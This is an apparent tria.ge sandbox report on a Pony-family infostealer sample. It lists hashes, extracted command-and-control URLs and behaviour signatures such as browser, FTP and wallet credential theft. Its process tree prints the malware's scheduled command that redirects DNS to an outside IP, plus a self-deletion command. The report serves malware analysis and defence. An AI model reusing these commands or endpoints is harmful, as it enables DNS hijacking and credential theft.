Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
86s -
max time network
73s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
20/10/2022, 20:29
Static task
static1
Behavioral task
behavioral1
Sample
31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Resource
win10v2004-20220812-en
General
-
Target
31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
-
Size
226KB
-
MD5
4505bb59758f0fa632e1b1d6e25c5450
-
SHA1
2d55b6afc4b2495d014aca850bac334e6b363816
-
SHA256
31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718
-
SHA512
50ce9806c2fdc171dcf411a9564c3e08935f6a4c3e6729dfbca8327616bb8bfbeac9d6c0c9babe32f4de4876a0de089e9bacf05222be58149c1c6e517f4e510d
-
SSDEEP
1536:zP7q7CW2p0cUi/PlDxbmpfhjekGbtK01mPHD6JURJM:zPwimfwHtKTHD6uLM
Malware Config
Extracted
pony
http://godekela.pw:571/fix/update.php
http://voekazik.pw:571/fix/update.php
Signatures
-
resource yara_rule behavioral1/memory/2044-55-0x0000000000400000-0x000000000041C000-memory.dmp upx behavioral1/memory/2044-56-0x0000000000400000-0x000000000041C000-memory.dmp upx behavioral1/memory/2044-57-0x0000000000400000-0x000000000041C000-memory.dmp upx behavioral1/memory/2044-62-0x0000000000400000-0x000000000041C000-memory.dmp upx behavioral1/memory/2044-64-0x0000000000400000-0x000000000041C000-memory.dmp upx behavioral1/memory/2044-65-0x0000000000400000-0x000000000041C000-memory.dmp upx behavioral1/memory/2044-66-0x0000000000400000-0x000000000041C000-memory.dmp upx behavioral1/memory/2044-71-0x0000000000400000-0x000000000041C000-memory.dmp upx -
Deletes itself 1 IoCs
pid Process 460 cmd.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1088 set thread context of 2044 1088 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe 26 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\calc2.exe 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1048 PING.EXE -
Suspicious use of AdjustPrivilegeToken 32 IoCs
description pid Process Token: SeImpersonatePrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeTcbPrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeChangeNotifyPrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeCreateTokenPrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeBackupPrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeRestorePrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeIncreaseQuotaPrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeAssignPrimaryTokenPrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeImpersonatePrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeTcbPrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeChangeNotifyPrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeCreateTokenPrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeBackupPrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeRestorePrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeIncreaseQuotaPrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeAssignPrimaryTokenPrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeImpersonatePrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeTcbPrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeChangeNotifyPrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeCreateTokenPrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeBackupPrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeRestorePrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeIncreaseQuotaPrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeAssignPrimaryTokenPrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeImpersonatePrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeTcbPrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeChangeNotifyPrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeCreateTokenPrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeBackupPrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeRestorePrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeIncreaseQuotaPrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe Token: SeAssignPrimaryTokenPrivilege 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 1088 wrote to memory of 2044 1088 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe 26 PID 1088 wrote to memory of 2044 1088 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe 26 PID 1088 wrote to memory of 2044 1088 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe 26 PID 1088 wrote to memory of 2044 1088 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe 26 PID 1088 wrote to memory of 2044 1088 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe 26 PID 1088 wrote to memory of 2044 1088 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe 26 PID 1088 wrote to memory of 2044 1088 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe 26 PID 1088 wrote to memory of 2044 1088 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe 26 PID 1088 wrote to memory of 2044 1088 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe 26 PID 2044 wrote to memory of 944 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe 27 PID 2044 wrote to memory of 944 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe 27 PID 2044 wrote to memory of 944 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe 27 PID 2044 wrote to memory of 944 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe 27 PID 944 wrote to memory of 288 944 cmd.exe 29 PID 944 wrote to memory of 288 944 cmd.exe 29 PID 944 wrote to memory of 288 944 cmd.exe 29 PID 944 wrote to memory of 288 944 cmd.exe 29 PID 2044 wrote to memory of 460 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe 30 PID 2044 wrote to memory of 460 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe 30 PID 2044 wrote to memory of 460 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe 30 PID 2044 wrote to memory of 460 2044 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe 30 PID 460 wrote to memory of 1048 460 cmd.exe 32 PID 460 wrote to memory of 1048 460 cmd.exe 32 PID 460 wrote to memory of 1048 460 cmd.exe 32 PID 460 wrote to memory of 1048 460 cmd.exe 32
Processes
-
C:\Users\Admin\AppData\Local\Temp\31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe"C:\Users\Admin\AppData\Local\Temp\31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Users\Admin\AppData\Local\Temp\31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe"C:\Users\Admin\AppData\Local\Temp\31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe"2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c at 01:33:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.200", "8.8.8.8")3⤵
- Suspicious use of WriteProcessMemory
PID:944 -
C:\Windows\SysWOW64\at.exeat 01:33:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.200", "8.8.8.8")4⤵PID:288
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping -n 10 localhost && erase "C:\Users\Admin\AppData\Local\Temp\31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe"3⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:460 -
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost4⤵
- Runs ping.exe
PID:1048
-
-
-